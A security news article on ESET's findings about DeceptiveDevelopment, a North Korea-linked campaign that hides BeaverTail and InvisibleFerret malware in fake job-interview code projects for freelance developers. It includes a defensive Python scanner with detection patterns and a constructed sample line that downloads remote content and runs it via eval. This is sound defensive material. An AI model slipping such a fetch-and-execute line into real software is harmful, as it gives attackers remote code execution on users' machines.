Freelance software developers have become the primary target of an ongoing campaign, which utilizes job interview-themed decoys to deliver malware families known as BeaverTail and InvisibleFerret. The activity, linked to North Korea, has been codenamed DeceptiveDevelopment and overlaps with various clusters tracked under different names, including Contagious Interview, DEV#POPPER, Famous Chollima, PurpleBravo, and Tenacious Pungsan, with the campaign being active since at least late 2023.

According to cybersecurity company ESET, DeceptiveDevelopment targets freelance software developers through spear-phishing on job-hunting and freelancing sites, with the primary goal of stealing cryptocurrency wallets and login information from browsers and password managers. In a report shared with The Hacker News, ESET reiterated that the campaign has been ongoing since at least late 2023 and is attributed to North Korea.

The attack chains involve the use of fake recruiter profiles on social media to reach out to prospective targets and share trojanized codebases hosted on GitHub, GitLab, or Bitbucket that deploy backdoors under the pretext of a job interview process. In November 2024, ESET confirmed to The Hacker News the overlaps between DeceptiveDevelopment and Contagious Interview, classifying it as a new Lazarus Group activity aimed at conducting cryptocurrency theft.

The malicious actors have expanded their reach to other job-hunting platforms, including Upwork, Freelancer.com, We Work Remotely, Moonlight, and Crypto Jobs List. The hiring challenges typically involve fixing bugs or adding new features to crypto-related projects, with the malicious code often hidden in a single line inside an otherwise benign component of the project.

Security researcher Matěj Havránek noted that the victims are instructed to build and execute the project to test it, which is where the initial compromise occurs. The repositories used are usually private, and the victim is first asked to provide their account ID or email address to be granted access, likely to conceal the malicious activity from researchers.
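As an added defender-side illustration (not code from ESET's report or from the campaign), the following Python pre-build check looks for the single-line pattern described above in a repository received from an unfamiliar recruiter: abnormally long source lines, and lines that combine dynamic code execution with encoded or remote content. The sample file, the length threshold, the file extensions and the pattern list are assumptions chosen for this example.

```python
import re
from pathlib import Path

# Heuristics for reviewing a "take-home" repository before building it.
# A loader hidden on one line tends to be much longer than the surrounding
# hand-written code and to mix dynamic execution with encoded or remote data.
MAX_NORMAL_LINE = 300  # assumption: few hand-written source lines exceed this
SUSPICIOUS_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bnew\s+Function\s*\("),
    re.compile(r"\bexec\s*\("),
    re.compile(r"base64|atob\s*\(|fromCharCode"),
    re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),  # URL pointing at a raw IP
]

def scan_source(text: str, path: str = "<inline>") -> list[dict]:
    """Return one finding per line that is over-long or matches >= 2 patterns."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(line)]
        if len(line) > MAX_NORMAL_LINE or len(hits) >= 2:
            findings.append({"path": path, "line": lineno,
                             "length": len(line), "patterns": hits})
    return findings

def scan_repo(root: str, exts=(".js", ".ts", ".py", ".json")) -> list[dict]:
    """Walk a checked-out repository; vendored minified code will also trigger
    the length rule, so treat findings as lines to read, not as verdicts."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.suffix in exts and "node_modules" not in p.parts:
            findings.extend(scan_source(p.read_text(errors="replace"), str(p)))
    return findings

# Constructed sample: a benign-looking config module with one injected line
# (documentation-range IP, inert payload; not material from the campaign).
SAMPLE = "\n".join([
    "// config.js (constructed sample)",
    "const settings = { network: 'mainnet', retries: 3 };",
    'const q=require("http");q.get("http://192.0.2.10/u",r=>{let d="";'
    'r.on("data",c=>d+=c);r.on("end",()=>eval(atob(d)))});',
    "module.exports = settings;",
])

if __name__ == "__main__":
    for f in scan_source(SAMPLE, "config.js"):
        print(f"{f['path']}:{f['line']} len={f['length']} hits={len(f['patterns'])}")
```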

A second method used to achieve initial compromise involves tricking victims into installing malware-laced video conferencing platforms like MiroTalk or FreeConference. Both BeaverTail and InvisibleFerret have information-stealing capabilities, with the former serving as a downloader for the latter.

InvisibleFerret is a modular Python malware that retrieves and executes three additional components: pay, bow, and adc. These components are responsible for collecting information, stealing login data, and installing the AnyDesk remote desktop software.

  • pay collects information and acts as a backdoor, capable of accepting remote commands from an attacker-controlled server to log keystrokes, capture clipboard content, run shell commands, exfiltrate files and data from mounted drives, as well as install the AnyDesk and browser module, and gather information from browser extensions and password managers.
  • bow steals login data, autofill data, and payment information stored in Chromium-based browsers like Chrome, Brave, Opera, Yandex, and Edge.
  • adc functions as a persistence mechanism by installing the AnyDesk remote desktop software.

ESET noted that the primary targets of the campaign are software developers working in cryptocurrency and decentralized finance projects across the world, with significant concentrations reported in Finland, India, Italy, Pakistan, Spain, South Africa, Russia, Ukraine, and the U.S.

The attackers do not distinguish based on geographical location and aim to compromise as many victims as possible to increase the likelihood of successfully extracting funds and information. This is also evidenced by the apparently poor coding practices of the operators, ranging from a failure to remove development notes to leaving in local IP addresses used for development and testing.